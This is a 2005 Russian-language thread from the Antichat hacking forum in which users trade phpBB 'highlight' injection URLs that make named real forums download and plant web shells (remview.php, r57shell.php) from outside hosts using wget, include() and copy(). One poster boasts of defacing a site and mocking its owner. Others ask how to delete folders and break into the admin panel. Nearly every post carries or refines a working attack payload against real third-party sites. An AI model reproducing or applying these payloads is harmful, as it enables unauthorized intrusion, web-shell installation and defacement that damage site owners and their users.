Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Вопрос про заливку шелла через уязвимость в highligh (https://forum.antichat.xyz/showthread.php?t=4723)

rsha1988 12.01.2005 08:10
Вопрос про заливку шелла через уязвимость в highligh
 
Есть форум http://bomg.ru/forum/
Пробывал загрузить в него remview.php этими способами:

viewtopic.php?p=1&highlight=%2527.$poster=%60$ls%6 0.%2527&ls=wget%20http://........../remview.php
viewtopic.php?p=3906&highlight=%2527.$poster=`wget %09http://.........../remview.php`.%2527
viewtopic.php?=http://............./remview.php%00&t=1&highlight=%2527.include($_GET[44]).%2527

и не один из них не подошол, а какие еще способы есть?

frisco_virus 12.01.2005 08:25
viewtopic.php?xxx=wget%20http://supershish.narod.ru/remview.php&p=12&highlight=%2527.system($_GET[xxx]).include%2527

rsha1988 12.01.2005 08:38
viewtopic.php?10=wget%20http://.........ru/remview.php&p=12&highlight=%2527.system($_GET[/images/avatars/]).include%2527
Не так тоже не хочет!

rsha1988 12.01.2005 17:41
Люди че такое????
http://bomg.ru/forum/remview.php :confused:
Че я такое сделал?
Мля, я щас повещусь!

Red 12.01.2005 18:19
такой баг мной был так же замечен на других хостах. юзай тогда проще:
http://rredial.narod.ru/r57shell.php
тока пароль в теле проги поменяй (сейчас он и усер и пас 1234)

rsha1988 12.01.2005 18:59
спасибо, похоже работает!
Только не как не пойму как ей пользоваться?

SHiTS 12.01.2005 19:12
а че это ваще такое?

rsha1988 12.01.2005 19:18
не стал мудиться :D
Достало меня это все!
Просто залил html страницу!
http://bomg.ru/forum/

SHiTS 12.01.2005 19:21
МАЛАДЕЦ!!!

rsha1988 12.01.2005 20:02
блин, уже страницу удалилит!!!!!!!!

rsha1988 12.01.2005 20:27
А есть какой нибуть еще шел???

Xalegi 12.01.2005 23:11
а оно надо??? remview.php суперская вещь =)

rsha1988 12.01.2005 23:12
Не спорю но он не коректно работает!

frisco_virus 12.01.2005 23:47
rsha a ti kakim sposobom zalil tuda shell ya vot dosehpor nikak nemogu zalit shell na http://obshaga.com

rsha1988 13.01.2005 08:36
Заливал так:
/viewtopic.php?a=http://salogta.narod.ru/remview.php&b=remview.php&t=1&highlight=%2527%252e copy($_GET[a],$_GET[b])%252e%2527

rsha1988 13.01.2005 09:17
Ну а всетаки, какой нибуть другой шел есть?

Xalegi 13.01.2005 11:51
дык... вроде заливать нужно какой-либо командой =) wget к примеру... или я не прав?

rsha1988 13.01.2005 12:17
Ну не знаю, у меня так получилось только шелл почти не фига не работает! :(

rsha1988 13.01.2005 12:22
А ака нибуть папку можно удалить???

rsha1988 13.01.2005 14:13
http://kneu.net.ua/forum/viewtopic.php?p=45&xxx=http://salogta.narod.ru/remview.php&highlight=%2527.include($_GET[xxx]).include%2527 - посмотрите че за фигня получаеться... эт че такое блин? :D

Xalegi 13.01.2005 14:35
хмм... ти рмивиев качал с этого сайта?

rsha1988 13.01.2005 16:18
Помойму да (точно не помню), и эта фигня у меня уже не в первый раз!

rsha1988 13.01.2005 16:33
Взломал один сайт и вот что там написали:

Колонка редактора

С нашим любимым сайтом позабавлялась одна нискосортная единица рода человеческого. Причем, скажу вам честно, крайне невовремя. Хоть на выходных ерундой страдал бы чтоли?

Некоторое время будут недоступны несколько разделов.

Но нет причин к беспокойству — у сайта есть бекап. Так что это вопрос времени.

Всем спасибо, даже тебе, дурачек. Буду знать, что мир не без мудаков.
___________________________________________
Он меня обидил!
Хотябы поблагодарил за то что я сломал его дерьмо... ;)

rsha1988 13.01.2005 18:24
Люди, ну чего такое блин, ну не хочет:
http://kneu.net.ua/forum/viewtopic.php?t=14&xxx=http://salogta.narod.ru/remview.php?c=d&d=/usr/local/psa/home/vhosts/kneu.net.ua/httpdocs/forum/images/avatars/gallery&highlight=%2527.include($_GET[xxx]).include%2527
Ну кто знает что я не правильно делаю???

illusion 13.01.2005 21:19
ты не дописал имя скрипта...
И вообще, запрос ошибочный!
Такой надо юзать!

viewtopic.php?a=http://твой_ремотер&b=твоё_имя_файл а&t=1&highlight=%2527%252ecopy($_GET[a],$_GET[b])%252e%2527

rsha1988 14.01.2005 09:23
Ну не получаеться даже таким способом!
http://kneu.net.ua/forum/viewtopic.php?a=http://salogta.narod.ru/remview.php&b=help.php&t=14&highlight=%2527%252eco py($_GET[a],$_GET[b])%252e%2527
Смотри- http://kneu.net.ua/forum/help.php

rsha1988 14.01.2005 09:25
При загрузки пишет - Warning: copy(help.php): failed to open stream: Permission denied in /usr/local/psa/home/vhosts/kneu.net.ua/httpdocs/forum/viewtopic.php(1104) : regexp code on line 1 :confused:

Xalegi 14.01.2005 11:24
дык.. у меня такая же проблема.. вточности... тоже самое пишет =(((

может не правильный ремвиев? так как когда только появилось видео.. я брал ремвиев с сайта www.supermegalox.narod.ru/remview.php и ВСЁ РАБОТАЛО !!! (но сейчас по-моему сайт прикрыли)

мож на античатовском ремвиеве надо что-то подправить?

rsha1988 14.01.2005 12:17
Может!
Я скачивал и з других сайтов шелл и он тоже не работал..
Так что ктонибуть дайте работающий remview.php! плизззззззззз. :D

rsha1988 14.01.2005 12:27
А мне вобще почемуто не один файл не залить..

rsha1988 15.01.2005 13:46
remview.php- а как можно загрузить не в корневую папку а например в папку с аватарами?

onyx3 21.01.2005 13:15
Какой коммандой можно посматреть какие пипки открыты на запись??

dull 21.01.2005 19:39
ну залил я remview ,да ftp доступ есть ,кроме дифейса что можно еще предпринять

rsha1988 21.01.2005 20:40
Цитата:
Сообщение от dull
ну залил я remview ,да ftp доступ есть ,кроме дифейса что можно еще предпринять
Ну поидее можеш залесть в алминку сайта (если пассы не в базе данных). ;)


Время: 20:38